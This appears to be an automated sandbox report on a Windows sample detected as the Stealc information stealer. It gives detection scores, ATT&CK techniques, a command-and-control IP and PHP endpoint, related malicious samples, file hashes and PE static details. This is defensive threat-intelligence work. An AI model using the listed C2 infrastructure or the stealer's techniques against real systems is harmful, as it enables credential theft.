Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8WOUWb5iEv.exe.2500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8WOUWb5iEv.exe.2500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.23f0e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.23f0e67.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WOUWb5iEv.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8WOUWb5iEv.exe.2500000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.8WOUWb5iEv.exe.2500000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.23f0e67.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.8WOUWb5iEv.exe.23f0e67.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8WOUWb5iEv.exe PID: 6720, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 Create Account	11 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	31 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	11 Process Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	22 Software Packing	DCSync	1 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	133 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
8WOUWb5iEv.exe	42%	ReversingLabs	Win32.Trojan.Generic
8WOUWb5iEv.exe	40%	Virustotal		Browse
8WOUWb5iEv.exe	100%	Avira	HEUR/AGEN.1306992
8WOUWb5iEv.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
https://docs.rs/getrandom#nodejs-es-module-support	0%	URL Reputation	safe
http://upx.sf.net	0%	URL Reputation	safe
http://77.83.175.105	7%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://77.83.175.105/18a9a962225b1ffb.php	true		unknown
http://77.83.175.105/	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://77.83.175.105/18a9a962225b1ffb.php%:	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://77.83.175.105;	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://77.83.175.105/18a9a962225b1ffb.phpk:	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://77.83.175.105/d:iU	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://77.83.175.105	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	true	7%, Virustotal, Browse	unknown
https://docs.rs/getrandom#nodejs-es-module-support	8WOUWb5iEv.exe, 8WOUWb5iEv.exe, 00000000.00000003.1676570870.0000000002500000.00000004.00001000.00020000.00000000.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 8WOUWb5iEv.exe, 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://77.83.175.105/7:	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.3.dr	false	URL Reputation: safe	unknown
http://77.83.175.105/18a9a962225b1ffb.php4	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://77.83.175.105/18a9a962225b1ffb.phpT	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://77.83.175.105/AL	8WOUWb5iEv.exe, 00000000.00000002.1921164990.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.83.175.105	unknown	Ukraine		204601	ON-LINE-DATAServerlocation-NetherlandsDrontenNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544236
Start date and time:	2024-10-29 04:56:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	8WOUWb5iEv.exe renamed because original name is a hash value
Original Sample Name:	dbfb5a1fee1df3d86b1cdba9e338b31d.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 23 Number of non-executed functions: 198
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.168.117.173
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
23:57:22	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.83.175.105	X9d3758tok.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105/18a9a962225b1ffb.php
	KMfWqiiMu0.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105/18a9a962225b1ffb.php
	hwWxZRwpeL.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105/18a9a962225b1ffb.php
	KTvTgKJSyw.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105/18a9a962225b1ffb.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ON-LINE-DATAServerlocation-NetherlandsDrontenNL	X9d3758tok.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105
	KMfWqiiMu0.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105
	hwWxZRwpeL.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105
	KTvTgKJSyw.exe	Get hash	malicious	Stealc, Vidar	Browse	77.83.175.105
	s4aALx5IMD.exe	Get hash	malicious	Stealc	Browse	92.119.114.74
	CIVHRLlEUk.exe	Get hash	malicious	Stealc	Browse	92.119.114.74
	aDHzARrzIa.exe	Get hash	malicious	Stealc	Browse	92.119.114.74
	AkWvbt4CFh.exe	Get hash	malicious	Stealc	Browse	92.119.114.74
	vkkTIT6kcx.exe	Get hash	malicious	Stealc, Vidar	Browse	92.119.114.74
	2YHpql8v3B.exe	Get hash	malicious	Stealc	Browse	45.88.76.205

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_8WOUWb5iEv.exe_80bab832ae0336fa3a173ad788cd95d652d5_ea07dd38_faf1113e-2f58-4fe5-9372-4358337c6723\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9623890843732951
Encrypted:	false
SSDEEP:	192:8orikK0n5dPRojxCZrMZtzuiFGZ24IO8P:8zkR51RojDTzuiFGY4IO8P
MD5:	1BB724A31803EB1FFDF2CC38C3484E6E
SHA1:	1093E3DDF5B63F2BE10BB8000D34FEF2D2FE52B0
SHA-256:	0BB83B30DCEFC11BDA000F6B00FD898F698B2E0D603975B4C1B207B8880E5C05
SHA-512:	E49268AF443FCBEA66B5908223DF72BC8CE2EB75A47F307F7146041AF3B717436488A1A8C0EA581C69D07B81E61CEBB5C0EE1354CB54A58B60484F84AED22403
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.4.7.8.1.9.5.1.6.8.1.4.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.4.7.8.2.0.0.3.2.4.3.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.f.1.1.1.3.e.-.2.f.5.8.-.4.f.e.5.-.9.3.7.2.-.4.3.5.8.3.3.7.c.6.7.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.3.3.e.5.e.c.-.9.7.4.f.-.4.7.8.7.-.a.7.4.e.-.2.9.e.a.2.2.0.e.c.1.2.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.8.W.O.U.W.b.5.i.E.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.0.-.0.0.0.1.-.0.0.1.4.-.9.d.4.6.-.0.2.9.9.b.6.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.a.d.c.4.5.b.e.d.8.4.6.7.e.4.5.f.1.a.1.e.2.1.6.1.e.e.4.9.e.6.5.0.0.0.0.f.f.f.f.!.0.0.0.0.8.a.d.3.a.c.1.b.5.6.5.6.3.0.8.9.1.c.9.6.5.f.5.4.f.4.c.1.4.4.d.a.1.2.5.f.5.7.2.c.!.8.W.O.U.W.b.5.i.E.v...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA45.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Oct 29 03:56:59 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	65322
Entropy (8bit):	1.9134502860220912
Encrypted:	false
SSDEEP:	384:9s7USbnaXTWsE3RTKSnWwmeKsoukjdjUsG3:wUSOXKsElnW0xkHs
MD5:	D065A0DD76C33B56FA5DDA49A366C8DA
SHA1:	B2A2B6AAA041AF3553D6AD9C0F523031656EF4AD
SHA-256:	F57F053F39CAFACEFD38D4662288CB18E3F94177E8A5BDF2E03C83F9108277DB
SHA-512:	7DAA39E89947F9D7BF652DD5C95ADD021C18260A1850F30B617B88F729BD5360DA55E8964E030FA2423B2049BB8705C93650B6DAB95F9EEF0D2DC5065DDF5E93
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........] g............4...............<.......$....*..........T.......8...........T...........P3..........................................................................................................eJ......H.......GenuineIntel............T.......@....] g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB5F.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.695327487186007
Encrypted:	false
SSDEEP:	192:R6l7wVeJd/6dYvgDb8H6Y9BSU9VIYgmfmxxv5X5SpDM89bYXsfPnom:R6lXJ16dYw8H6YLSU9VIYgmfm+YcfV
MD5:	F379BE91720509FD5347B3129D878756
SHA1:	7EEF0CF53EB886033779AA5C31D63D07A002E726
SHA-256:	A03BAAE536235AB4744F8D62725561D146F6FEA2DC16AAD9F1A655B230547ABB
SHA-512:	835034EDCA4BC530565A4F73EEA91B354ED7F442863C3441DA26FD59445BDBFD5B9D23B3C5153600B5A9609A2F481CC01C39AA86D98E01FE13DE83CF9AA1D31D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB8F.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4579
Entropy (8bit):	4.46759052541111
Encrypted:	false
SSDEEP:	48:cvIwWl8zsiJg77aI9e5WpW8VYuvYm8M4JeDyrLiyrw6Ff+q8OyXEyN1w6o8izqhU:uIjfwI7AI7VpyJwWuawQD4E+u6ovqhed
MD5:	FD66574728F349FBE8B9ADF10F81C7D4
SHA1:	B5CA71AE8129C05AC099CAC40E522314142CC5B8
SHA-256:	7592A6A8F919AF034E38ADB59ACD99DCAE3211FE205B5D66BC58A0C0A304A4FB
SHA-512:	DAFDBD5886CBEFD08B24133E7CD967DFF41F0E795F18E1F22DCC60C65D9FF597E6F5C4CFD4EA08D813257515F00D6D6F28EB5729D8BA1E08B3D7347A6A3B9034
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="564179" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465444243669975
Encrypted:	false
SSDEEP:	6144:JIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNedwBCswSbu:6XD94+WlLZMM6YFHA+u
MD5:	173BE4DA0ED55B370AA5075122739CE6
SHA1:	DCCE1BB30F3A9E75FF6B7B59DF9B4554B78BAA6A
SHA-256:	F44D89B91AA329C3DA4C2A6201F739A03BF377710AD9A609EE50B86D72CAC47F
SHA-512:	70A945126D16268F991B8A09EDCD37DD0B534EB6594CA61A652CB37CAFEDE948E7E6DB326DC94999ED6A0E36259B0F1D98E6824558C2C9CF56E80F1011687C7A
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN{...)..............................................................................................................................................................................................................................................................................................................................................^..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.276843705662776
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	8WOUWb5iEv.exe
File size:	712'192 bytes
MD5:	dbfb5a1fee1df3d86b1cdba9e338b31d
SHA1:	8ad3ac1b565630891c965f54f4c144da125f572c
SHA256:	54fa4544762fb14d407756fad69201bfaccc8db821a94e63079531d556cddeb1
SHA512:	7a9993a1031aadd95bbd903e5aa6b671153106801b07e59da752aed8975c4fda3a762af9f3edc377c5632e19279913f6aa3a183162aee885871bb07931581f85
SSDEEP:	12288:oT21qIgEAUr7vJvnjBaU/n0K4TnYzUSHzYlQM7vWF6M/Ukk:oKkILAUr7v7aU/0KaU3z/MjW18kk
TLSH:	E1E412953880E1B1D8154170EC7D8AF42F7BFC279A75A69733283F9F3971281AAE6311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\..A\..A\..AB.tAG..AB.eAB..AB.sA8..A{..A[..A\..A(..AB.zA]..AB.dA]..AB.aA]..ARich\..A........................PE..L....L.d...

File Icon


Icon Hash:	63796de971636e0f

Static PE Info

General

Entrypoint:	0x405edb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64F64CAB [Mon Sep 4 21:31:23 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	eaddeabe4dc2146d8bbc6de524b45db8

Entrypoint Preview

Instruction
call 00007F4264EDF406h
jmp 00007F4264EDB16Eh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
call 00007F4264EDB32Ch
xchg cl, ch
jmp 00007F4264EDB314h
call 00007F4264EDB323h
fxch st(0), st(1)
jmp 00007F4264EDB30Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007F4264EDB301h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007F4264EDB2F6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007F4264EDB2F4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007F4264EDB2F7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007F4264EDB92Fh
fstp st(0)
fld tbyte ptr [0049308Ah]
ret
fstp st(0)
or cl, cl
je 00007F4264EDB2FDh
fstp st(0)
fldpi
or ch, ch
je 00007F4264EDB2F4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007F4264EDB2E9h
fchs
ret
fstp st(0)
jmp 00007F4264EDB905h
fstp st(0)
mov cl, ch
jmp 00007F4264EDB2F2h
call 00007F4264EDB2BEh
jmp 00007F4264EDB910h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x92154	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xae000	0x14948	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2eb000	0xa00	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x47f8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x184	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x91a3a	0x91c00	733162d59f51a63a0e7d0e82abd153ba	False	0.8684119720197255	data	7.618486265802441	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x93000	0x1a200	0x5c00	da88833653b7c0fb3d509b66c726efe6	False	0.07965353260869565	dBase III DBT, next free block index 7565155	0.9338507284032901	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xae000	0x23c948	0x14a00	b3408715885c276f2157ac9f32b490b1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2eb000	0x16f6	0x1800	ccde14f0896de3e04032d79354b5a4b3	False	0.3636067708333333	data	3.6188526439123714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
LIGENAZIMAFIFAPOGEDUCEDOD	0xb8be8	0x136f	ASCII text, with very long lines (4975), with no line terminators	Tamil	India	0.5953768844221106
LIGENAZIMAFIFAPOGEDUCEDOD	0xb8be8	0x136f	ASCII text, with very long lines (4975), with no line terminators	Tamil	Sri Lanka	0.5953768844221106
POJOKOLOSIVOF	0xb9f58	0x1e31	ASCII text, with very long lines (7729), with no line terminators	Tamil	India	0.5835166256954328
POJOKOLOSIVOF	0xb9f58	0x1e31	ASCII text, with very long lines (7729), with no line terminators	Tamil	Sri Lanka	0.5835166256954328
RAJENEWOWEZASUSARIJEJUWA	0xb8200	0x9e7	ASCII text, with very long lines (2535), with no line terminators	Tamil	India	0.6055226824457594
RAJENEWOWEZASUSARIJEJUWA	0xb8200	0x9e7	ASCII text, with very long lines (2535), with no line terminators	Tamil	Sri Lanka	0.6055226824457594
RT_CURSOR	0xbbde8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0xbcc90	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0xbd538	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0xbdad0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0xbdc00	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0xbdcd8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0xbeb80	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0xbf428	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0xbf9c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0xc0868	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0xc1110	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
